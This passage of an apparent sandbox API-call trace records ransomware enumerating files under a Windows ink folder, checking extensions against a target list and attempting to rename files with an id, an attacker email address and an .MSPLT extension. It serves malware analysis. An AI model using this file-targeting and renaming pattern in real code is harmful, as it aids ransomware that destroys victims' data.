lstrlenW (lpString=".dbf") returned 4 [0287.864] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.864] lstrlenW (lpString=".1cd") returned 4 [0287.864] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.864] lstrlenW (lpString=".jpg") returned 4 [0287.864] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.865] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.865] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0287.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.901] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1600388) returned 1 [0287.901] CloseHandle (hObject=0x420) returned 1 [0287.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0287.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0287.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.901] lstrlenW (lpString=".doc") returned 4 [0287.901] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".docx") returned 5 [0287.902] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.902] lstrlenW (lpString=".pdf") returned 4 [0287.902] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".xls") returned 4 [0287.902] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".xlsx") returned 5 [0287.902] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.902] lstrlenW (lpString=".ppt") returned 4 [0287.902] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.902] lstrlenW (lpString=".zip") returned 4 [0287.902] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".rar") returned 4 [0287.902] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".bz2") returned 4 [0287.902] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.902] lstrlenW (lpString=".7z") returned 3 [0287.902] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString=".dbf") returned 4 [0287.903] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString=".1cd") returned 4 [0287.903] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString=".jpg") returned 4 [0287.903] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString=".doc") returned 4 [0287.903] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString=".docx") returned 5 [0287.903] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.903] lstrlenW (lpString=".pdf") returned 4 [0287.903] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString=".xls") returned 4 [0287.903] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString=".xlsx") returned 5 [0287.903] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.903] lstrlenW (lpString=".ppt") returned 4 [0287.903] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.903] lstrlenW (lpString=".zip") returned 4 [0287.904] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.904] lstrlenW (lpString=".rar") returned 4 [0287.904] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.904] lstrlenW (lpString=".bz2") returned 4 [0287.904] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.904] lstrlenW (lpString=".7z") returned 3 [0287.904] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.904] lstrlenW (lpString=".dbf") returned 4 [0287.904] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.904] lstrlenW (lpString=".1cd") returned 4 [0287.904] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0287.904] lstrlenW (lpString=".jpg") returned 4 [0287.904] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.904] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.904] lstrlenW (lpString="insertbase.xml") returned 14 [0287.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.924] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=903) returned 1 [0287.924] CloseHandle (hObject=0x420) returned 1 [0287.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0287.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.924] lstrlenW (lpString=".doc") returned 4 [0287.924] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString=".docx") returned 5 [0287.925] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.925] lstrlenW (lpString=".pdf") returned 4 [0287.925] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString=".xls") returned 4 [0287.925] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString=".xlsx") returned 5 [0287.925] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.925] lstrlenW (lpString=".ppt") returned 4 [0287.925] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.925] lstrlenW (lpString=".zip") returned 4 [0287.925] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.925] lstrlenW (lpString=".rar") returned 4 [0287.925] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString=".bz2") returned 4 [0287.925] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString=".7z") returned 3 [0287.925] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.925] lstrlenW (lpString=".dbf") returned 4 [0287.925] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.925] lstrlenW (lpString=".1cd") returned 4 [0287.925] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.925] lstrlenW (lpString=".jpg") returned 4 [0287.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.926] lstrlenW (lpString=".doc") returned 4 [0287.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString=".docx") returned 5 [0287.926] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.926] lstrlenW (lpString=".pdf") returned 4 [0287.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString=".xls") returned 4 [0287.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString=".xlsx") returned 5 [0287.926] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.926] lstrlenW (lpString=".ppt") returned 4 [0287.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.926] lstrlenW (lpString=".zip") returned 4 [0287.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.926] lstrlenW (lpString=".rar") returned 4 [0287.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString=".bz2") returned 4 [0287.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.926] lstrlenW (lpString=".7z") returned 3 [0287.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.927] lstrlenW (lpString=".dbf") returned 4 [0287.927] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.927] lstrlenW (lpString=".1cd") returned 4 [0287.927] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0287.927] lstrlenW (lpString=".jpg") returned 4 [0287.927] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.927] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.927] lstrlenW (lpString="keypadbase.xml") returned 14 [0287.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.947] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=903) returned 1 [0287.947] CloseHandle (hObject=0x420) returned 1 [0287.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0287.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.952] lstrlenW (lpString=".doc") returned 4 [0287.952] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString=".docx") returned 5 [0287.952] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.952] lstrlenW (lpString=".pdf") returned 4 [0287.952] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString=".xls") returned 4 [0287.952] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString=".xlsx") returned 5 [0287.952] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.952] lstrlenW (lpString=".ppt") returned 4 [0287.952] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.952] lstrlenW (lpString=".zip") returned 4 [0287.952] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.952] lstrlenW (lpString=".rar") returned 4 [0287.952] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString=".bz2") returned 4 [0287.952] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.952] lstrlenW (lpString=".7z") returned 3 [0287.952] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.952] lstrlenW (lpString=".dbf") returned 4 [0287.953] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.953] lstrlenW (lpString=".1cd") returned 4 [0287.953] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.953] lstrlenW (lpString=".jpg") returned 4 [0287.953] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.953] lstrlenW (lpString=".doc") returned 4 [0287.953] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString=".docx") returned 5 [0287.953] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.953] lstrlenW (lpString=".pdf") returned 4 [0287.953] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString=".xls") returned 4 [0287.953] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString=".xlsx") returned 5 [0287.953] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.953] lstrlenW (lpString=".ppt") returned 4 [0287.953] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.953] lstrlenW (lpString=".zip") returned 4 [0287.953] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.953] lstrlenW (lpString=".rar") returned 4 [0287.953] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.953] lstrlenW (lpString=".bz2") returned 4 [0287.954] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.954] lstrlenW (lpString=".7z") returned 3 [0287.954] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.954] lstrlenW (lpString=".dbf") returned 4 [0287.954] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.954] lstrlenW (lpString=".1cd") returned 4 [0287.954] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0287.954] lstrlenW (lpString=".jpg") returned 4 [0287.954] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.954] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.954] lstrlenW (lpString="base_ca.xml") returned 11 [0287.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.956] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3529) returned 1 [0287.956] CloseHandle (hObject=0x420) returned 1 [0287.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0287.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.957] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.957] lstrlenW (lpString=".doc") returned 4 [0287.957] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.957] lstrlenW (lpString=".docx") returned 5 [0287.957] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0287.957] lstrlenW (lpString=".pdf") returned 4 [0287.957] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.957] lstrlenW (lpString=".xls") returned 4 [0287.957] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.957] lstrlenW (lpString=".xlsx") returned 5 [0287.957] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0287.957] lstrlenW (lpString=".ppt") returned 4 [0287.957] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.957] lstrlenW (lpString=".zip") returned 4 [0287.957] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.957] lstrlenW (lpString=".rar") returned 4 [0287.958] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString=".bz2") returned 4 [0287.958] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString=".7z") returned 3 [0287.958] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.958] lstrlenW (lpString=".dbf") returned 4 [0287.958] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.958] lstrlenW (lpString=".1cd") returned 4 [0287.958] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.958] lstrlenW (lpString=".jpg") returned 4 [0287.958] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.958] lstrlenW (lpString=".doc") returned 4 [0287.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString=".docx") returned 5 [0287.958] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0287.958] lstrlenW (lpString=".pdf") returned 4 [0287.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString=".xls") returned 4 [0287.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString=".xlsx") returned 5 [0287.958] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0287.958] lstrlenW (lpString=".ppt") returned 4 [0287.958] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.959] lstrlenW (lpString=".zip") returned 4 [0287.959] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.959] lstrlenW (lpString=".rar") returned 4 [0287.959] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.959] lstrlenW (lpString=".bz2") returned 4 [0287.959] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.959] lstrlenW (lpString=".7z") returned 3 [0287.959] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.959] lstrlenW (lpString=".dbf") returned 4 [0287.959] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.959] lstrlenW (lpString=".1cd") returned 4 [0287.959] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0287.959] lstrlenW (lpString=".jpg") returned 4 [0287.959] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.959] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.959] lstrlenW (lpString="base_heb.xml") returned 12 [0287.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.963] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=738) returned 1 [0287.963] CloseHandle (hObject=0x420) returned 1 [0287.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0287.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.964] lstrlenW 